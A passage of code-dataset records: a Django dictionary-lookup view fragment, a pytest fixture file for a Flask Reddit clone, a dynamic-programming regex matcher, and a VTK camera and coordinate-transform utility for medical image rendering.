ET.fromstring(response).findall('item')\n result = [{'word': item.findtext('word').replace('^', ' ').replace('-', ''), 'mean': item.find('sense').findtext('definition')} for item in parsed]\n\n original_word = Word.objects.filter(south=word)\n for orig in original_word:\n orig.description = result[0].get('mean')\n orig.save()\n\n return result[0]\n","sub_path":"sinabro/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"587287774","text":"\"\"\"Defines fixtures available to all tests.\"\"\"\nimport os\nimport pathlib\nimport pytest\n\nfrom flask import current_app\nfrom reddit.app import create_app\nfrom reddit.extensions import db\nfrom reddit import subreddits, threads, user, votes\nfrom unittest.mock import patch\n\n\n@pytest.fixture(scope='session')\ndef test_client(request):\n #os.environ['FLASK_ENV'] = 'testing'\n\n mock_app_event_init = patch('reddit.app.event_publisher.init_app')\n mock_db_send_event = patch('reddit.database.event_publisher.send_event')\n mock_db_cache = patch('reddit.database.cache.set')\n\n mock_app_event_init.start()\n mock_db_send_event.start()\n mock_db_cache.start()\n\n mock_app_event_init.return_value = True\n mock_db_send_event.return_value = True\n\n #mock_db_cache.set = log_mock\n\n app = create_app()\n test_client = app.test_client()\n ctx = app.app_context()\n ctx.push()\n\n request.addfinalizer(lambda: ctx.pop())\n\n yield test_client\n\n\n@pytest.fixture(scope=\"session\")\ndef test_database(request, test_client):\n db.create_all()\n\n def tear_down():\n db.drop_all()\n # Hack for sqlite always placing database in app directory rather than root\n database_uri = current_app.config['SQLALCHEMY_DATABASE_URI']\n if database_uri.startswith('sqlite'):\n db_path = database_uri.strip('sqlite:///')\n db_name = pathlib.Path(db_path).name\n for dirname, _, filenames in os.walk('.'):\n for filename in filenames:\n if filename == db_name:\n os.remove(os.path.join(dirname, filename))\n return\n\n request.addfinalizer(tear_down)\n\n yield db\n\n\n@pytest.fixture(scope='module')\ndef test_data(test_database):\n user1 = user.models.User(username='user_test1', email='test1@gmail.com', password='password')\n user2 = user.models.User(username='user_test2', email='test2@gmail.com', password='password')\n user1.save()\n user2.save()\n\n sub1 = subreddits.models.Subreddit(\n name='test_sub1',\n description='A subreddit for testing.',\n creator_id=user1.id\n )\n\n thread1 = threads.models.Thread(\n title='test_thread',\n description='A thread for testing',\n author_id=user1.id,\n subreddit=sub1\n )\n\n data = {'users': [user1, user2],\n 'subreddits': [sub1],\n 'threads': [thread1]}\n\n for key, models in data.items():\n for instance in models:\n if key != 'users':\n instance.save()\n\n yield data\n\n for key, models in data.items():\n for instance in models:\n instance.delete()\n","sub_path":"tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"79314695","text":"\"\"\"\n// Time Complexity : O(len(s)*len(p))\n// Space Complexity : O(len(s)*len(p))\n// Did this code successfully run on Leetcode : Yes\n// Any problem you faced while coding this : No\n\n// Your code here along with comments explaining your approach\nAlgorithm Explanation\nGiven below - DP\n\"\"\"\nclass Solution:\n def isMatch(self, s: str, p: str) -> bool:\n \"\"\"\n Main idea is we can break down each ch* into two decision making mode - 0 char or 1 char, since we can expand the string on * at each recursive level, we can get overlapping subproblems with result string/intermediate string acts as subproblem ->DP\n Tabulation method\n - Create a dp array, dp[s.length+1][p.length+1] consisting of False values\n - dp[0][0] = T (blank matches blank)\n - Fill the first row of dp\n If the last element of p == '*'\n dp[0][j] = dp[0][j-2] // go 2 places back such that string before start of * is covered eg _c*a* _c* (for a*) would have been computed before\n - For row = 1 to dp.length\n For col = 1 to dp[0].length\n If current char is not a star \n - s[row-1] == p[col-1] \n dp[row][col] = dp[row-1][col-1]\n else:\n dp[row][col] = dp[row][col-2] #fetching the value corresponding to zero for *\n if s[row-1] == p[col-2] or p[col-2] == '.': # case for considering 1\n dp[row][col] = dp[row][col] or dp[row-1][col]\n \n - return dp[dp.length-1][dp[0].length-1] \n \"\"\"\n dp = [[False for _ in range(len(p)+1)] for _ in range(len(s)+1)]\n dp[0][0] = True\n for j in range(1,len(dp[0])):\n if p[j-1] == '*':\n dp[0][j] = dp[0][j-2]\n \n for i in range(1,len(dp)):\n for j in range(1,len(dp[0])):\n #current char in pattern not a star\n if s[i-1] == p[j-1] or p[j-1] == '.':\n dp[i][j] = dp[i-1][j-1]\n elif p[j-1] == '*':\n dp[i][j] = dp[i][j-2] # getting the value for 0 case\n \n #check for case 1 for *\n if s[i-1] == p[j-2] or p[j-2] == '.':\n dp[i][j] |= dp[i-1][j]\n return dp[len(dp)-1][len(dp[0])-1]","sub_path":"regular_expression.py","file_name":"regular_expression.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"238188983","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"\n This Class is mainly to do camera position for VR and MPR.\n\"\"\"\nimport numpy as np\nimport render_common\nfrom vtk import *\n\n\nclass FovInfo:\n def __init__(self):\n self.ExtentLen = 1 # milimeter\n self.Spacing = 1 # spacing\n self.vecInPatient = [0, 0, 1] # real Ori in Patient Coord\n self.vecInPatientOrth = [0, 0, 1]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n\n self._axis_head = [0.0, 0.0, 1.0]\n self._axis_left = [1.0, 0.0, 1.0]\n self._axis_anterior = [0.0, -1.0, 0.0]\n\n def get_fov_info(self, dim, spacing, orientation, AxisType, AxisPosType):\n \"\"\"\n According to AxisType, Get FovInfo Value\n :param dim:\n :param spacing:\n :param orientation:\n :param AxisType: X_NEG = 0 X_POS = 1 Y_NEG = 2 Y_POS = 3 Z_NEG = 4 Z_POS = 5\n :param AxisPosType: POS_RIGTH = 0 POS_LEFT = 1 POS_ANTERIOR = 2 POS_POSTERIOR = 3 POS_FOOT = 4 POS_HEAD = 5\n :return:\n \"\"\"\n if AxisType is render_common.AxisType.X_POS:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = orientation[0]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_POS\n elif AxisType is render_common.AxisType.X_NEG:\n self.ExtentLen = dim[0] * spacing[0]\n self.Spacing = spacing[0]\n self.vecInPatient = - orientation[0]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.X_NEG\n elif AxisType is render_common.AxisType.Y_POS:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Y_POS\n elif AxisType is render_common.AxisType.Y_NEG:\n self.ExtentLen = dim[1] * spacing[1]\n self.Spacing = spacing[1]\n self.vecInPatient = - orientation[1]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType] * -1\n self.vVolumeCoord = render_common.AxisType.Y_NEG\n elif AxisType is render_common.AxisType.Z_POS:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = orientation[2]\n self.vecInPatientOrth = render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_POS\n elif AxisType is render_common.AxisType.Z_NEG:\n self.ExtentLen = dim[2] * spacing[2]\n self.Spacing = spacing[2]\n self.vecInPatient = - orientation[2]\n self.vecInPatientOrth = - render_common.AxisValue.axis_vlaue[AxisPosType]\n self.vVolumeCoord = render_common.AxisType.Z_NEG\n return self\n\n\ndef cal_nearest_axis(dim, spacing, orientation, FovHead, FovLeft, FovAnterior):\n \"\"\"\n By Calculating the projection of volume orientation in the patient XYZ Axis, we can get the volume 是\n 体数据是侧卧,还是背卧,还是正躺等\n 确定与病人头方向、左方向、前方向最为接近的volume坐标系下的坐标轴及三个轴方向在病人坐标系下实际方向\n :param dim:\n :param spacing:\n :param orientation:\n :param FovHead: 与病人头方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovLeft: 与病人左方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :param FovAnterior: 与病人前方向最为接近的volume坐标系下的坐标轴及该轴方向在病人坐标系下实际方向\n :return:\n \"\"\"\n left_patient_coord = [1, 0, 0]\n anterior_patient_coord = [0, -1, 0]\n head_patient_coord = [0, 0, 1]\n orientation[0] = orientation[0] / np.linalg.norm(orientation[0]) # normalize of orientation\n orientation[1] = orientation[1] / np.linalg.norm(orientation[1]) # normalize of orientation\n orientation[2] = orientation[2] / np.linalg.norm(orientation[2]) 
# normalize of orientation\n volume_x_head = np.dot(orientation[0], head_patient_coord)\n volume_y_head = np.dot(orientation[1], head_patient_coord)\n volume_z_head = np.dot(orientation[2], head_patient_coord)\n volume_x_left = np.dot(orientation[0], left_patient_coord)\n volume_y_left = np.dot(orientation[1], left_patient_coord)\n volume_z_left = np.dot(orientation[2], left_patient_coord)\n volume_x_anterior = np.dot(orientation[0], anterior_patient_coord)\n volume_y_anterior = np.dot(orientation[1], anterior_patient_coord)\n volume_z_anterior = np.dot(orientation[2], anterior_patient_coord)\n\n # Priority is TRA > COR > SAG.\n if np.abs(volume_z_head) > np.abs(volume_y_head) and np.abs(volume_z_head) > np.abs(volume_x_head):\n if volume_z_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Z_NEG\n if np.abs(volume_x_left) > np.abs(volume_y_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n else:\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_x_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n elif np.abs(volume_y_head) > np.abs(volume_x_head) and np.abs(volume_y_head) > np.abs(volume_z_head):\n if volume_y_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.Y_NEG\n if np.abs(volume_x_left) > np.abs(volume_z_left):\n if volume_x_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.X_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_x_anterior > 0: # anterior falls on the X axis here (head ~ Y, left ~ Z)\n FovAnterior.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.X_NEG\n else:\n if volume_x_head > 0:\n FovHead.vVolumeCoord = render_common.AxisType.X_POS\n else:\n FovHead.vVolumeCoord = render_common.AxisType.X_NEG\n if np.abs(volume_y_left) > np.abs(volume_z_left):\n if volume_y_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Y_NEG\n if volume_z_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Z_NEG\n else:\n if volume_z_left > 0:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_POS\n else:\n FovLeft.vVolumeCoord = render_common.AxisType.Z_NEG\n if volume_y_anterior > 0:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_POS\n else:\n FovAnterior.vVolumeCoord = render_common.AxisType.Y_NEG\n\n # int(render_common.PatientPositionType.POS_HEAD)\n fov_head = FovHead.get_fov_info(dim, spacing, orientation, FovHead.vVolumeCoord, 5)\n # int(render_common.PatientPositionType.POS_LEFT)\n fov_left = FovLeft.get_fov_info(dim, spacing, orientation, FovLeft.vVolumeCoord, 1)\n # int(render_common.PatientPositionType.POS_ANTERIOR)\n 
fov_anterior = FovAnterior.get_fov_info(dim, spacing, orientation, FovAnterior.vVolumeCoord, 2)\n return fov_head, fov_left, fov_anterior\n\n\ndef get_default_camera_lookat(fovinfo_head, fovinfo_left, fovinfo_anterior, pos_type, center):\n \"\"\"\n Use fovinfo_head, fovinfo_left and fovinfo_anterior to get the camera look-at point\n :param fovinfo_head:\n :param fovinfo_left:\n :param fovinfo_anterior:\n :param pos_type: PositionType\n :param center:\n :return:\n \"\"\"\n look_at_point = center\n if pos_type is render_common.PositionType.SAGITTAL:\n view_dir = - fovinfo_left.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n # +0.5 cancels floating-point rounding error before truncating to int\n sag_dim = int(fovinfo_left.ExtentLen / fovinfo_left.Spacing + 0.5)\n if sag_dim % 2 == 1: # odd voxel count: shift the look-at point by half a voxel\n look_at_point -= view_dir * 0.5 * fovinfo_left.Spacing\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n view_dir = - fovinfo_head.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n tra_dim = int(fovinfo_head.ExtentLen / fovinfo_head.Spacing + 0.5)\n if tra_dim % 2 == 1:\n look_at_point -= view_dir * 0.5 * fovinfo_head.Spacing\n else:\n view_dir = - fovinfo_anterior.vecInPatient\n view_dir = view_dir / np.linalg.norm(view_dir)\n ant_dim = int(fovinfo_anterior.ExtentLen / fovinfo_anterior.Spacing + 0.5)\n if ant_dim % 2 == 1:\n look_at_point -= view_dir * 0.5 * fovinfo_anterior.Spacing\n return look_at_point\n\n\ndef check_orthogonal(orientation):\n \"\"\"\n Check whether the volume is orthogonal. If it is not, eye_dir should be re-calculated for MPRs\n :param orientation:\n :return:\n \"\"\"\n MIN_TOLERANCE = 0.000001\n dot_x_y = np.dot(orientation[0], orientation[1])\n dot_x_z = np.dot(orientation[0], orientation[2])\n dot_y_z = np.dot(orientation[1], orientation[2])\n\n # compare magnitudes: a negative dot product is just as non-orthogonal\n if abs(dot_x_y) > MIN_TOLERANCE or abs(dot_x_z) > MIN_TOLERANCE or abs(dot_y_z) > MIN_TOLERANCE:\n return False\n else:\n return True\n\n\ndef get_default_mpr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL / TRANSVERSAL / CORONAL\n :param same_aspect_ratio: set True when the TRA (transversal), COR (coronal) and SAG (sagittal) views should share the same scale\n :return: the configured vtkCamera\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 1\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 1, max_extent * 6)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not useful? In VTK, the aspect ratio is calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_default_vr_camera(dim, spacing, orientation, center, pos_type, same_aspect_ratio=False):\n \"\"\"\n\n :param dim:\n :param spacing:\n :param orientation:\n :param pos_type: render_common.PositionType.SAGITTAL / TRANSVERSAL / CORONAL\n :param same_aspect_ratio: set True when the TRA (transversal), COR (coronal) and SAG (sagittal) views should share the same scale\n :return: the configured vtkCamera\n \"\"\"\n # Step1: Calculate the nearest axis of volume x-y-z in patient coord.\n # camera =render.GetActiveCamera()\n camera = vtk.vtkCamera()\n fov_head = FovInfo()\n fov_left = FovInfo()\n fov_anterior = FovInfo()\n cal_nearest_axis(dim, spacing, orientation, fov_head, fov_left, fov_anterior)\n\n # Step2: Calculate the position of camera look at point by different pos_type\n # pos_look_at = [0, 0, 0]\n pos_look_at = get_default_camera_lookat(fov_head, fov_left, fov_anterior, pos_type, center)\n\n # Step3: Get max of extent of the volume\n extent = [dim[0] * spacing[0], dim[1] * spacing[1], dim[2] * spacing[2]]\n # max_extent = np.max(extent)\n max_extent = np.linalg.norm(extent, ord=2) * 0.5\n # Step4: Calculate eye_dir and up_dir for different position type of MPR (TRA, COR,SAG)\n b_orthogonal = 
check_orthogonal(orientation)\n if pos_type is render_common.PositionType.SAGITTAL:\n if same_aspect_ratio is False:\n ortho_width = fov_anterior.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_left.vecInPatient\n else:\n eye_dir = np.cross(fov_head.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_head.vecInPatient\n elif pos_type is render_common.PositionType.TRANSVERSAL:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_anterior.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_head.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_anterior.vecInPatient)\n up_dir = fov_anterior.vecInPatient\n else:\n if same_aspect_ratio is False:\n ortho_width = fov_left.ExtentLen\n ortho_height = fov_head.ExtentLen\n if b_orthogonal is True:\n eye_dir = fov_anterior.vecInPatient\n else:\n eye_dir = np.cross(fov_left.vecInPatient, fov_head.vecInPatient)\n up_dir = fov_head.vecInPatient\n\n eye_dir = eye_dir / np.linalg.norm(eye_dir)\n # pos_eye = eye_dir\n x_dir = np.cross(up_dir, eye_dir)\n x_dir = x_dir / np.linalg.norm(x_dir)\n\n # TODO [fei.wang@united-imaging.com] aspect_ratio should calculate and set into the viewport of windows\n # aspect_ratio = ortho_width / ortho_height\n\n # Step5: Set parameters of Camera\n\n factor = 3\n pos_eye = eye_dir * max_extent * factor + pos_look_at\n camera.SetClippingRange(max_extent * 2.5, max_extent * 3.5)\n\n camera.SetFocalPoint(pos_look_at)\n camera.SetPosition(pos_eye)\n camera.SetViewUp(up_dir)\n\n # render.ResetCamera()\n\n # Step6: Others for SetOrthoWindow(dOrthoWidth, dOrthoHeight);\n # TODO: fei.wang 20181006 The following parameters are useless for camera, Why ?\n camera.SetParallelProjection(True) # Not Useful ? 
In VKT, the AspectRation is Calculated by Render->ViewPort\n camera.SetParallelScale(ortho_height) # Not Useful ?\n screen_bottom_left = pos_look_at + x_dir * -0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_bottom_right = pos_look_at + x_dir * 0.5 + up_dir * -0.5 + eye_dir * 0.5\n screen_top_right = pos_look_at + x_dir * 0.5 + up_dir * 0.5 + eye_dir * 0.5\n render_common.logging.info(\"screen_bottom_left\" + str(screen_bottom_left)\n + \"screen_bottom_right\" + str(screen_bottom_right)\n + \"screen_top_right\" + str(screen_top_right))\n camera.SetScreenBottomLeft(screen_bottom_left) # default ScreenBottomLeft Value is : [-0.5, -0.5, -0.5]\n camera.SetScreenBottomRight(screen_bottom_right) # default ScreenBottomRight Value is : [0.5, -0.5, -0.5]\n camera.SetScreenTopRight(screen_top_right) # default ScreenTopRight Value is : [0.5, 0.5, -0.5]\n return camera\n\n\ndef get_slice_axis_matrix(camera):\n \"\"\"\n The function usually used to set matrix of MPR\n :param camera:\n :return:\n \"\"\"\n # Step1: calculate z_dir\n camera_pos = camera.GetPosition()\n camera_focal = camera.GetFocalPoint()\n z_dir = [camera_pos[0] - camera_focal[0], camera_pos[1] - camera_focal[1], camera_pos[2] - camera_focal[2]]\n z_dir_norm = np.linalg.norm(z_dir, ord=2)\n z_dir_normalized = z_dir / z_dir_norm\n render_common.logging.info(\"z_dir_normalized\" + str(z_dir_normalized[0])\n + str(z_dir_normalized[1]) + str(z_dir_normalized[2]))\n # Step2: Calculate y_dir\n camera_view_up = camera.GetViewUp()\n camera_view_up = camera_view_up / np.linalg.norm(camera_view_up)\n\n # Step3: Calculate x_dir\n x_dir_normal = np.cross(camera_view_up, z_dir_normalized)\n\n # Step4: Get SliceAxis Matrix of MPR\n return ((x_dir_normal[0], camera_view_up[0], z_dir_normalized[0], camera_focal[0],\n x_dir_normal[1], camera_view_up[1], z_dir_normalized[1], camera_focal[1],\n x_dir_normal[2], camera_view_up[2], z_dir_normalized[2], camera_focal[2],\n 0, 0, 0, 1))\n\n\ndef np_2_vtkMatrix(mat):\n if mat.shape == (4, 4):\n obj = vtk.vtkMatrix4x4()\n for i in range(4):\n for j in range(4):\n obj.SetElement(i, j, mat[i, j])\n return obj\n\n\ndef vtkMatrix_to_np(vtk_mat):\n if isinstance(vtk_mat, vtk.vtkMatrix4x4):\n np_mat = np.matrix(np.arange(16).reshape(4, 4), dtype=float)\n if np_mat.shape == (4, 4):\n for i in range(4):\n for j in range(4):\n np_mat[i, j] = vtk_mat.GetElement(i, j)\n return np_mat\n\n\ndef get_view_matrix(camera):\n return vtkMatrix_to_np(camera.GetViewTransformMatrix)\n\n\ndef get_projection_matrix(scene):\n camera = scene.get_camera()\n projection_matrix = camera.GetProjectionTransformMatrix(scene.get_render())\n return vtkMatrix_to_np(projection_matrix)\n\n\ndef tranform_world_to_screen_vtk_inner(vtk_view_port, vtk_camera, point3dworld):\n # World2View Tranform\n cur_camera = vtk_camera\n vtk_view_port.ComputeAspect()\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n point3dworld[3] = 1.0\n x0 = mat_vp.GetElement(0, 0)*point3dworld[0] + mat_vp.GetElement(0, 1)*point3dworld[1] \\\n + mat_vp.GetElement(0, 2)*point3dworld[2] + mat_vp.GetElement(0, 3)*point3dworld[3]\n x1 = mat_vp.GetElement(1, 0) * point3dworld[0] + mat_vp.GetElement(1, 1) * point3dworld[1] \\\n + mat_vp.GetElement(1, 2) * point3dworld[2] + mat_vp.GetElement(1, 3) * point3dworld[3]\n x2 = mat_vp.GetElement(2, 0) * point3dworld[0] + mat_vp.GetElement(2, 1) * point3dworld[1] \\\n + mat_vp.GetElement(2, 2) * point3dworld[2] + mat_vp.GetElement(2, 3) * point3dworld[3]\n x3 = mat_vp.GetElement(3, 0) * 
point3dworld[0] + mat_vp.GetElement(3, 1) * point3dworld[1] \\\n + mat_vp.GetElement(3, 2) * point3dworld[2] + mat_vp.GetElement(3, 3) * point3dworld[3]\n\n point4d_view = [x0, x1, x2, x3]\n if point4d_view[3] != 0:\n point4d_view = [point4d_view[0] / point4d_view[3], point4d_view[1] / point4d_view[3],\n point4d_view[2] / point4d_view[3], point4d_view[3] / point4d_view[3]]\n\n vtk_view_port.SetViewPoint([point4d_view[0], point4d_view[1], point4d_view[2]])\n vtk_view_port.ViewToDisplay()\n point3d_screen = vtk_view_port.GetDisplayPoint()\n return point3d_screen\n\n\ndef transform_world_to_screen_vtk(scene, point3dworld):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return tranform_world_to_screen_vtk_inner(cur_renderer, cur_camera, point3dworld)\n\n\ndef transform_screen_to_world_vtk_inner(vtk_view_port, vtk_camera, point3dscreen):\n # Screen2View Transform\n vtk_view_port.SetDisplayPoint(point3dscreen)\n vtk_view_port.DisplayToView()\n point3dscreen = vtk_view_port.GetViewPoint() # Range in [-1, 1]\n\n # View2World Transform\n cur_camera = vtk_camera\n mat_vp = cur_camera.GetCompositeProjectionTransformMatrix(vtk_view_port.GetTiledAspectRatio(), 0, 1)\n mat_vp_invert = vtk.vtkMatrix4x4()\n vtkMatrix4x4.Invert(mat_vp, mat_vp_invert)\n point4dscreen = [point3dscreen[0], point3dscreen[1], point3dscreen[2], 1.0]\n x0 = mat_vp_invert.GetElement(0, 0)*point4dscreen[0] + mat_vp_invert.GetElement(0, 1)*point4dscreen[1] \\\n + mat_vp_invert.GetElement(0, 2)*point4dscreen[2] + mat_vp_invert.GetElement(0, 3)*point4dscreen[3]\n x1 = mat_vp_invert.GetElement(1, 0) * point4dscreen[0] + mat_vp_invert.GetElement(1, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(1, 2) * point4dscreen[2] + mat_vp_invert.GetElement(1, 3) * point4dscreen[3]\n x2 = mat_vp_invert.GetElement(2, 0) * point4dscreen[0] + mat_vp_invert.GetElement(2, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(2, 2) * point4dscreen[2] + mat_vp_invert.GetElement(2, 3) * point4dscreen[3]\n x3 = mat_vp_invert.GetElement(3, 0) * point4dscreen[0] + mat_vp_invert.GetElement(3, 1) * point4dscreen[1] \\\n + mat_vp_invert.GetElement(3, 2) * point4dscreen[2] + mat_vp_invert.GetElement(3, 3) * point4dscreen[3]\n\n point4d_world = [x0, x1, x2, x3]\n if point4d_world[3] != 0:\n point4d_world = [point4d_world[0] / point4d_world[3], point4d_world[1] / point4d_world[3],\n point4d_world[2] / point4d_world[3], point4d_world[3] / point4d_world[3]]\n return [point4d_world[0], point4d_world[1], point4d_world[2]]\n\n\ndef transform_screen_to_world_vtk(scene, point3dscreen):\n cur_renderer = scene.get_render()\n cur_camera = scene.get_camera()\n return transform_screen_to_world_vtk_inner(cur_renderer, cur_camera, point3dscreen)\n\n\ndef transform_screen_to_world_zwh(scene, point2d):\n cur_renderer = scene.get_render()\n picker = vtkWorldPointPicker()\n picker.Pick(point2d[0], point2d[1], 0, cur_renderer)\n last_point = picker.GetPickPosition()\n return last_point\n\n\ndef transform_screen_to_world(scene, point2d):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n point3d_screen = [point2d[0], point2d[1], 0.0]\n return transform_screen_to_world_vtk(scene, point3d_screen)\n\n\ndef transform_world_to_screen(scene, point3d_world):\n \"\"\"\n tranform screen to world\n :param Renderer:\n :param point2d:\n :return:\n \"\"\"\n screen3d = transform_world_to_screen_vtk(scene, [point3d_world[0], point3d_world[1], point3d_world[2], 1.0])\n return [screen3d[0], 
screen3d[1]]\n\n","sub_path":"visualization/camera_utility.py","file_name":"camera_utility.py","file_ext":"py","file_size_in_byte":25907,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
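# A hedged usage sketch for get_default_mpr_camera above, assuming an
# axis-aligned volume. The render_common module (PositionType/AxisType) is
# not shown here, so the enum value below is an assumption.
import numpy as np

dim = [512, 512, 300]
spacing = [0.7, 0.7, 1.0]            # millimetres
orientation = np.eye(3)              # rows: volume x/y/z axes in patient coords
center = np.array([0.0, 0.0, 0.0])
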